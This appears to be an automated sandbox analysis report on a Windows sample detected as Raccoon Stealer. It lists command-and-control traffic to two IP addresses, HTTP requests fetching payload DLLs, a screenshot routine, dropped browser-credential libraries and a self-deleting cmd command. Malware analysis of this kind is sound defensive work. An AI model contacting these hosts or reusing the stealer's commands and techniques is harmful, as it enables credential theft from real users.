ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.245.137
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.245.137
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.245.137
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.245.137
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.245.137
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.245.137
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.174.40

Source: 4FGVZW19n7.exe, 00000000.00000003.324132855.000000004B47B000.00000004.00000010.sdmp	String found in binary or memory: http://194.180.174.40/
Source: 4FGVZW19n7.exe, 00000000.00000002.326551748.000000004B47B000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324132855.000000004B47B000.00000004.00000010.sdmp	String found in binary or memory: http://194.180.174.40/N#9
Source: 4FGVZW19n7.exe, 00000000.00000002.326551748.000000004B47B000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324132855.000000004B47B000.00000004.00000010.sdmp	String found in binary or memory: http://194.180.174.40/p
Source: ldap60.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ldap60.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: ldap60.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: ldap60.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: ldap60.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ldap60.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ldap60.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://ocsp.accv.es0
Source: ldap60.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ldap60.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: ldap60.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: 4FGVZW19n7.exe, 00000000.00000002.326551748.000000004B47B000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324132855.000000004B47B000.00000004.00000010.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico6&
Source: ldap60.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ldap60.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ldap60.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: ldap60.dll.0.dr	String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.0.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nssckbi.dll.0.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4FGVZW19n7.exe, 00000000.00000003.290465926.000000004B401000.00000004.00000010.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 4FGVZW19n7.exe, 00000000.00000003.290465926.000000004B401000.00000004.00000010.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: ldap60.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 4FGVZW19n7.exe, 00000000.00000002.326551748.000000004B47B000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324132855.000000004B47B000.00000004.00000010.sdmp	String found in binary or memory: https://www.google.c
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.40

Source: global traffic	HTTP traffic detected: GET /duglassa1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 94.158.245.137
Source: global traffic	HTTP traffic detected: GET //l/f/EqqPhH0B3dP17Spz-q0u/13167c5f54fcce8683665e37815363c28e6e2bbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.40
Source: global traffic	HTTP traffic detected: GET //l/f/EqqPhH0B3dP17Spz-q0u/f65289ae65b845a69c17cd35ec8393a2da58e887 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.40

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_00429913 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.4FGVZW19n7.exe.20b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4FGVZW19n7.exe.2140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.20b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4FGVZW19n7.exe.2140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.326178018.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282477220.0000000002140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.326412832.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4FGVZW19n7.exe PID: 7084, type: MEMORYSTR

Source: 4FGVZW19n7.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_004362A1
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0041E6DA
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040E727
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00410AD2
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00434CB5
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0043CD97
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0041D364
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040D560
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040F78B
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00427AAA
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00429B40
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040DC7B
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0041DD0B
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00435E43
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0044C1E6
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0043C20A
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0041C217
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0042035B
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_004103F7
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0044C443
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_004185E7
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0042862C
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0045CAE9
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0041AD32
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00459173
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00449120
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_004471B7
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00459293
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0046B4E6
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00463524
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0041B642
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00415816
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00441910
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00433A1A
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0045BBDC
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0041BE85
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0042BFF1

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: String function: 0043F670 appears 58 times
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: String function: 0044DE0F appears 80 times
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: String function: 00466770 appears 178 times

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_0043DE71: DeviceIoControl,GetLastError,

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: 4FGVZW19n7.exe, 00000000.00000002.326795172.000000006ED4B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs 4FGVZW19n7.exe
Source: 4FGVZW19n7.exe, 00000000.00000003.324233473.000000004B488000.00000004.00000010.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4FGVZW19n7.exe
Source: 4FGVZW19n7.exe, 00000000.00000003.324145874.000000004B488000.00000004.00000010.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4FGVZW19n7.exe
Source: 4FGVZW19n7.exe, 00000000.00000002.326655536.000000006EBF2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs 4FGVZW19n7.exe
Source: 4FGVZW19n7.exe, 00000000.00000003.324156064.000000004B493000.00000004.00000010.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4FGVZW19n7.exe
Source: 4FGVZW19n7.exe, 00000000.00000003.324241572.000000004B489000.00000004.00000010.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4FGVZW19n7.exe
Source: 4FGVZW19n7.exe, 00000000.00000002.326563960.000000004B48B000.00000004.00000010.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4FGVZW19n7.exe

Source: sqlite3.dll.0.dr

Static PE information: Number of sections : 18 > 10

Source: 4FGVZW19n7.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 4FGVZW19n7.exe	Virustotal: Detection: 50%
Source: 4FGVZW19n7.exe	ReversingLabs: Detection: 48%

Source: 4FGVZW19n7.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\4FGVZW19n7.exe "C:\Users\user\Desktop\4FGVZW19n7.exe"
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/67@0/2

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_004279D5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

Source: softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
